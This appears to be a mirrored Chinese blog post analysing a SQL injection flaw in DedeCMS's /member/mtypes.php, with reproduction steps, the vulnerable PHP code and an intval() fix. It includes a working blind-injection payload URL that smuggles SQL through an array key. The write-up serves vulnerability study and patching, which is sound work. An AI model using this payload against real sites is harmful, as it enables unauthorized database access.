zoukankan      html  css  js  c++  java
  • dedecms /member/mtypes.php SQL Injection Vul

    catalog

    1. 漏洞描述
    2. 漏洞触发条件
    3. 漏洞影响范围
    4. 漏洞代码分析
    5. 防御方法
    6. 攻防思考

    1. 漏洞描述

    Dedecms会员中心注入漏洞

    Relevant Link

    http://www.yunsec.net/a/security/bugs/script/2012/1220/12127.html


    2. 漏洞触发条件

    因为是update注入,并且用了>ExecuteNoneQuery所以不能采用benchmark延时注入,但是可以通过一个"返回状态差异"判断来进行忙注,如果条件成功那么mtypename='$name'就会被update了

    1. 首先打开: http://127.0.0.1/dedecms5.5/member/mtypes.php
    2. 添加一个分类,记住ID(1),和原来的分类名称(fenlei)
    3. 然后打开: http://127.0.0.1/dedecms5.5/member/mtypes.php?dopost=save&mtypename[1' or @`'` AND 1%3D1 and (select 'r')%3D'r' and '1'%3D'1]=4
    //将其中的1改成你的分类ID
    4. 结束之后打开之后返回: http://127.0.0.1/dedecms5.5/member/mtypes.php 
    //如果(select 'r')='r'的话 那么分类名称就被改成了4! 这样我们就能来判断是否满足条件了,二值判断注入

    Relevant Link

    http://www.wooyun.org/bugs/wooyun-2010-048880
    http://www.0x50sec.org/0day-exp/2012/12/id/1482/comment-page-1/#comment-57057


    3. 漏洞影响范围
    4. 漏洞代码分析

    /member/mtypes.php

    elseif ($dopost == 'save')
    {
        if(isset($mtypeidarr) && is_array($mtypeidarr))
        {
            $delids = '0';
            $mtypeidarr = array_filter($mtypeidarr, 'is_numeric');
            foreach($mtypeidarr as $delid)
            {
                $delids .= ','.$delid;
                unset($mtypename[$delid]);
            }
            $query = "delete from `#@__mtypes` where mtypeid in ($delids) and mid='$cfg_ml->M_ID';";
            $dsql->ExecNoneQuery($query);
        } 
        //通过$mtypename进行key注入
        foreach ($mtypename as $id => $name)
        {
            $name = HtmlReplace($name);
            //未对键值$id进行任何过滤就带入查询,导致注入
            $query = "update `#@__mtypes` set mtypename='$name' where mtypeid='$id' and mid='$cfg_ml->M_ID'"; 
            $dsql->ExecuteNoneQuery($query);
        }
        ShowMsg('分类修改完成','mtypes.php');
    } 


    5. 防御方法

    /member/mtypes.php

    elseif ($dopost == 'save')
    {
        if(isset($mtypeidarr) && is_array($mtypeidarr))
        {
            $delids = '0';
            $mtypeidarr = array_filter($mtypeidarr, 'is_numeric');
            foreach($mtypeidarr as $delid)
            {
                $delids .= ','.$delid;
                unset($mtypename[$delid]);
            }
            $query = "delete from `#@__mtypes` where mtypeid in ($delids) and mid='$cfg_ml->M_ID';";
            $dsql->ExecNoneQuery($query);
        } 
        //通过$mtypename进行key注入
        foreach ($mtypename as $id => $name)
        {
            $name = HtmlReplace($name);
            /* 对$id进行规范化处理 */
            $id = intval($id);
            /* */
            $query = "update `#@__mtypes` set mtypename='$name' where mtypeid='$id' and mid='$cfg_ml->M_ID'";  
            $dsql->ExecuteNoneQuery($query);
        }
        ShowMsg('分类修改完成','mtypes.php');
    } 

    通过intval规范互处理,使得黑客注入的盲注语句失效,即不管任何时候,返回结果都是能成功修改为4,即盲注的二值条件不存在了


    6. 攻防思考

    Copyright (c) 2015 LittleHann All rights reserved

  • 相关阅读:
    HDU 5795 A Simple Nim ——(Nim博弈 + 打表)
    【Insertion Sorted List】cpp
    【Merge K Sorted Lists】cpp
    【Merge Two Sorted Lists】cpp
    【Merge Sorted Array】cpp
    【Sum Root to Leaf Numbers】cpp
    【Binary Tree Maximum Path Sum】cpp
    【Path Sum II】cpp
    【Path Sum】cpp
    【Maximum Depth of Binary Tree 】cpp
  • 原文地址:https://www.cnblogs.com/LittleHann/p/4518862.html
Copyright © 2011-2022 走看看